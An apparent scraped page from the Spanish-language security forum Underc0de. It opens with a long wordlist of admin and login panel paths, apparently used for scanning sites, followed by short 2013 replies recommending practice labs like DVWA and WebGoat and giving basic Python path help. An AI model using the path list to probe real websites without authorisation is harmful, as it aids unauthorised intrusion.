administrator.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html modelsearch/login.php moderator.php moderator/login.php moderator/admin.php account.php pages/admin/admin-login.html admin/admin-login.html admin-login.html controlpanel.php admincontrol.php admin/adminLogin.html adminLogin.html admin/adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin.php webadmin/index.php webadmin/admin.php admin/controlpanel.html admin.html admin/cp.html cp.html adminpanel.php moderator.html administrator/index.html administrator/login.html user.html administrator/account.html administrator.html login.html modelsearch/login.html moderator/login.html adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html moderator/admin.html user.php
account.html controlpanel.html admincontrol.html panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php administratorlogin.php cms/ beheer/ webmaster/ web-master/ web-beheerder/ webbeheerder/ bestuur/ intranet/ intronet/ staff/ staff/index.php staff/login.php staff/members.php staff/member.php personeel/ personeel/login.php personeel/index.php account/index.php account/ manager/index.php manager/ manage/ manage/index.php controlemanager/ admin1.php admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html adm/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.
html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.
asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpmyadmin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/
admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ blog/wp-admin/
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Saludos!font color=
#374
Dudas y pedidos generales / Re:isos o medios controlado para poder practicar.
Enero 10, 2013, 04:04:19 AM
BadStore
WebGoat
DVWA
Pwnos
Damn Vulnerable Linux
Sé que hay más, pero por el momento las olvidé
Saludos!
WebGoat
DVWA
Pwnos
Damn Vulnerable Linux
Sé que hay más, pero por el momento las olvidé
Saludos!
#375
Talleres Underc0de / Re:Taller de Seguridad Wireless #1
Enero 09, 2013, 12:55:29 AM
Genial, sin duda le hecharé un vistazo
Saludos!
Saludos!
#376
Wargames y retos / Re:[Medium/Hard]MySQL Injection Challenge.
Enero 07, 2013, 05:01:09 PM
No encuentro la forma, el reemplazo que hace me tiene loco
Saludos!
Saludos!
#377
Dudas y pedidos generales / Re:[Ayuda]os.path.split(var)
Enero 07, 2013, 02:40:12 AM
gracias amigo 11Sep
#378
Dudas y pedidos generales / Re:[Ayuda]os.path.split(var)
Enero 06, 2013, 10:13:54 PM
Prueba:
Código: python
Apenas esté en casa puedo darle un vistazo mejor y si algo edito
Saludos!
a = str(self.RutaCarpeta.text())Apenas esté en casa puedo darle un vistazo mejor y si algo edito
Saludos!
#379
Dudas y pedidos generales / Re:[Ayuda]os.path.split(var)
Enero 06, 2013, 07:33:21 PM
¿Qué error te da y que parte de la ruta necesitas?
Saludos!
Saludos!
#380
Dudas y pedidos generales / Re:[Ayuda]os.path.split(var)
Enero 06, 2013, 06:24:00 PM
Y si intentas esto:
Código: python
Saludos!
a = "C:\Python27\Programa"
print a.replace("\\", "\\\\")Saludos!
